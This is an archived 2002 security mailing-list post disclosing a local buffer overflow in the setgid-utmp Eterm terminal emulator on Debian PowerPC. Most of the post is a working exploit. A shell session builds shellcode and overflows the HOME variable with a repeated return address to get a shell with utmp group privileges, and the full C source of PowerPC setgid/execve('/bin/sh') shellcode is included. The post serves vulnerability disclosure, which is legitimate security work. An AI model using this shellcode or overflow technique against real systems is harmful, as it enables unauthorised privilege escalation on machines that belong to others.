Eterm SGID utmp Buffer Overflow (Local)

From: Charles 'core' Stevenson (coreat_private)
Date: Sun Jan 13 2002 - 06:57:57 PST

Next message: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"

Previous message: Mark Curphey: "RE: Developerstore.com expose critical customer info"
Next in thread: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I found this last night looking for suids to overflow.  Tested on Debian
PowerPC Unstable. Yields gid utmp from which higher priveleges could be
gained with a little effort. I haven't looked too close but I think the
overflow might be in imlib2.

[-(core@euclid:/home/core/tmp)> gcc execve.c -o execve
[-(core@euclid:/home/core/tmp)> export EGG=`./execve`
sizeof(shellcode)=73
[-(core@euclid:/home/core/tmp)> ./getenv EGG
Shellcode @ 0x7fffff95                      
[-(core@euclid:/home/core/tmp)> export HOME=`perl -e 'print
"\x7f\xff\xff\x96"x1032'`
[-(core@euclid:/home/core/tmp)> Eterm
sh-2.05a$ id                         
uid=1000(core) gid=1000(core) egid=43(utmp) groups=1000(core)

ii  eterm          0.9.1-2        Enlightened Terminal Emulator
ii  libimlib2      1.0.4-1        Powerful image loading and rendering
library

/* execve.c
 *
 * PowerPC Linux Shellcode
 *
 * by Charles Stevenson <coreat_private>
 * 
 * original execve by my good friend 
 * Kevin Finisterre  <dotslashat_private>
 */

#include <stdio.h>

char shellcode[] =
/* setgid(43) utmp */
        "\x38\x60\x01\x37"              /* 100004a0: li     
r3,311             */
        "\x38\x63\xfe\xf4"              /* 100004a4: addi   
r3,r3,-268         */
        "\x3b\xc0\x01\x70"              /* 100004a8: li     
r30,368            */
        "\x7f\xc0\x1e\x70"              /* 100004ac: srawi  
r0,r30,3           */
        "\x44\xff\xff\x02"              /* 100004b0:
sc                         */
/* execve("/bin/sh") */
        "\x7c\xa5\x2a\x78"              /* 100004b0: xor       
r5,r5,r5        */
        "\x40\x82\xff\xed"              /* 100004b4: bnel+      100004a0
<main> */
        "\x7f\xe8\x02\xa6"              /* 100004b8: mflr      
r31             */
        "\x3b\xff\x01\x30"              /* 100004bc: addi      
r31,r31,304     */
        "\x38\x7f\xfe\xf4"              /* 100004c0: addi      
r3,r31,-268     */
        "\x90\x61\xff\xf8"              /* 100004c4: stw       
r3,-8(r1)       */
        "\x90\xa1\xff\xfc"              /* 100004c8: stw       
r5,-4(r1)       */
        "\x38\x81\xff\xf8"              /* 100004cc: addi      
r4,r1,-8        */
        "\x3b\xc0\x01\x60"              /* 100004d0: li        
r30,352         */
        "\x7f\xc0\x2e\x70"              /* 100004d4: srawi     
r0,r30,5        */
        "\x44\xff\xff\x02"              /* 100004d8:
sc                         */
        "\x2f\x62\x69\x6e"              /* 100004dc: cmpdi     
cr6,r2,26990    */
        "\x2f\x73\x68\x00";             /* 100004e0: cmpdi     
cr6,r19,26624   */

int main(int argc, char **argv) {
   fprintf(stderr,"sizeof(shellcode)=%d\n",sizeof(shellcode));
   //__asm__("b shellcode");
   printf("%s",shellcode);
   return 0;
}

Best Regards,
Charles 'core' Stevenson

Next message: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
Previous message: Mark Curphey: "RE: Developerstore.com expose critical customer info"
Next in thread: Simon 'corecode' Schubert: "Re: Eterm SGID utmp Buffer Overflow (Local)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jan 14 2002 - 12:14:46 PST